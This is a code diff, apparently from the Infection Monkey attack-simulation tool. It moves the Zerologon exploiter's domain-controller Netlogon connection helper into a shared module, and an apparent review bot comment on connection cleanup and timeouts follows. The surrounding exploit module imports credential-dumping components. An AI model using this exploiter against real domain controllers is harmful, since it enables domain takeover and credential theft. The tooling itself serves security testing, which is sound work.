diff --git a/monkey/infection_monkey/exploit/zerologon.py b/monkey/infection_monkey/exploit/zerologon.py
index 75e7d96f0..0a1dd8d6e 100644
--- a/monkey/infection_monkey/exploit/zerologon.py
+++ b/monkey/infection_monkey/exploit/zerologon.py
@@ -12,11 +12,10 @@ from binascii import unhexlify
 from typing import Dict, List, Optional, Sequence, Tuple
 import impacket
-from impacket.dcerpc.v5 import epm, nrpc, rpcrt, transport
+from impacket.dcerpc.v5 import nrpc, rpcrt
 from impacket.dcerpc.v5.dtypes import NULL
 from common.agent_events import CredentialsStolenEvent, PasswordRestorationEvent
-from common.common_consts.timeouts import LONG_REQUEST_TIMEOUT
 from common.credentials import Credentials, LMHash, NTHash, Username
 from common.tags import (
 T1003_ATTACK_TECHNIQUE_TAG,
@@ -27,7 +26,11 @@ from infection_monkey.exploit.HostExploiter import HostExploiter
 from infection_monkey.exploit.tools.wmi_tools import WmiTools
 from infection_monkey.exploit.zerologon_utils.dump_secrets import DumpSecrets
 from infection_monkey.exploit.zerologon_utils.options import OptionsForSecretsdump
-from infection_monkey.exploit.zerologon_utils.vuln_assessment import get_dc_details, is_exploitable
+from infection_monkey.exploit.zerologon_utils.vuln_assessment import (
+ connect_to_dc,
+ get_dc_details,
+ is_exploitable,
+)
 from infection_monkey.exploit.zerologon_utils.wmiexec import Wmiexec
 from infection_monkey.i_puppet import ExploiterResultData
 from infection_monkey.utils.capture_output import StdoutCapture
@@ -113,16 +116,6 @@ class ZerologonExploiter(HostExploiter):
 return self.exploit_result
- @staticmethod
- def connect_to_dc(dc_ip) -> object:
- binding = epm.hept_map(dc_ip, nrpc.MSRPC_UUID_NRPC, protocol="ncacn_ip_tcp")
- rpc_transport = transport.DCERPCTransportFactory(binding)
- rpc_transport.set_connect_timeout(LONG_REQUEST_TIMEOUT)
- rpc_con = rpc_transport.get_dce_rpc()
- rpc_con.connect()
- rpc_con.bind(nrpc.MSRPC_UUID_NRPC)
- return rpc_con
-
 def _send_exploit_rpc_login_requests(self, rpc_con) -> bool:
 for _ in interruptible_iter(range(0, self.MAX_ATTEMPTS), self.interrupt):
 exploit_attempt_result = self.try_exploit_attempt(rpc_con)
@@ -230,7 +223,7 @@ class ZerologonExploiter(HostExploiter):
 # Connect to the DC's Netlogon service.
 try:
- rpc_con = ZerologonExploiter.connect_to_dc(self.dc_ip)
+ rpc_con = connect_to_dc(self.dc_ip)
 except Exception as e:
 logger.info(f"Exception occurred while connecting to DC: {str(e)}")
 return False
diff --git a/monkey/infection_monkey/exploit/zerologon_utils/vuln_assessment.py b/monkey/infection_monkey/exploit/zerologon_utils/vuln_assessment.py
index 9690ce1a8..ba09a1cec 100644
--- a/monkey/infection_monkey/exploit/zerologon_utils/vuln_assessment.py
+++ b/monkey/infection_monkey/exploit/zerologon_utils/vuln_assessment.py
@@ -2,9 +2,9 @@ import logging
 from typing import Optional, Tuple
 import nmb.NetBIOS
-from impacket.dcerpc.v5 import nrpc, rpcrt
+from impacket.dcerpc.v5 import epm, nrpc, rpcrt, transport
-from common.common_consts.timeouts import MEDIUM_REQUEST_TIMEOUT
+from common.common_consts.timeouts import LONG_REQUEST_TIMEOUT, MEDIUM_REQUEST_TIMEOUT
 from common.utils.exceptions import DomainControllerNameFetchError
 from infection_monkey.model import VictimHost
 from infection_monkey.utils.threading import interruptible_iter
@@ -12,6 +12,16 @@ from infection_monkey.utils.threading import interruptible_iter
 logger = logging.getLogger(__name__)
+def connect_to_dc(dc_ip) -> object:
+ binding = epm.hept_map(dc_ip, nrpc.MSRPC_UUID_NRPC, protocol="ncacn_ip_tcp")
+ rpc_transport = transport.DCERPCTransportFactory(binding)
+ rpc_transport.set_connect_timeout(LONG_REQUEST_TIMEOUT)
+ rpc_con = rpc_transport.get_dce_rpc()
+ rpc_con.connect()
+ rpc_con.bind(nrpc.MSRPC_UUID_NRPC)
+ return rpc_con
+
+
 def get_dc_details(host: VictimHost) -> Tuple[str, str, str]:
 dc_ip = host.ip_addr
 dc_name = _get_dc_name(dc_ip=dc_ip)
@@ -39,7 +49,7 @@ def _get_dc_name(dc_ip: str) -> str:
 def is_exploitable(zerologon_exploiter_object) -> Tuple[bool, Optional[rpcrt.DCERPC_v5]]:
 # Connect to the DC's Netlogon service.
 try:
- rpc_con = zerologon_exploiter_object.connect_to_dc(zerologon_exploiter_object.dc_ip)
+ rpc_con = connect_to_dc(zerologon_exploiter_object.dc_ip)
 except Exception as err:
 error_message = f"Exception occurred while connecting to DC: {err}"
 logger.info(error_message)
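Review bot: In the added `connect_to_dc`, the connection opened by `rpc_con.connect()` is never closed when the following `rpc_con.bind(nrpc.MSRPC_UUID_NRPC)` raises, so each failed bind leaks a connected socket to the DC while the callers in `is_exploitable` and `zerologon.py` only see the exception; wrapping the bind in try/except and calling `rpc_con.disconnect()` before re-raising closes that gap. The timeout set on `rpc_transport` governs only the connect on the line after it, whereas `epm.hept_map` opens its own endpoint-mapper connection first and, as far as I can see, is not given a timeout — worth confirming whether that call accepts one, since an unresponsive endpoint mapper would stall the exploiter before `LONG_REQUEST_TIMEOUT` ever applies. The `-> object` annotation is looser than what this file already uses (`is_exploitable` returns `Optional[rpcrt.DCERPC_v5]`), so `def connect_to_dc(dc_ip: str) -> rpcrt.DCERPC_v5:` with a one-line docstring such as `"""Open a DCE/RPC connection to dc_ip bound to the Netlogon interface."""` would state the contract. Note also that `is_exploitable` now calls the module-level function rather than `zerologon_exploiter_object.connect_to_dc`, so any test that passed a stub exploiter to intercept the connection would now reach the network and must patch `connect_to_dc` at module level instead.
```python
def connect_to_dc(dc_ip: str) -> rpcrt.DCERPC_v5:
    """Open a DCE/RPC connection to dc_ip bound to the Netlogon interface."""
    # … unchanged: hept_map, transport factory, connect timeout, get_dce_rpc …
    rpc_con.connect()
    try:
        rpc_con.bind(nrpc.MSRPC_UUID_NRPC)
    except Exception:
        # Do not leak the connected socket when the bind is refused.
        rpc_con.disconnect()
        raise
    return rpc_con
```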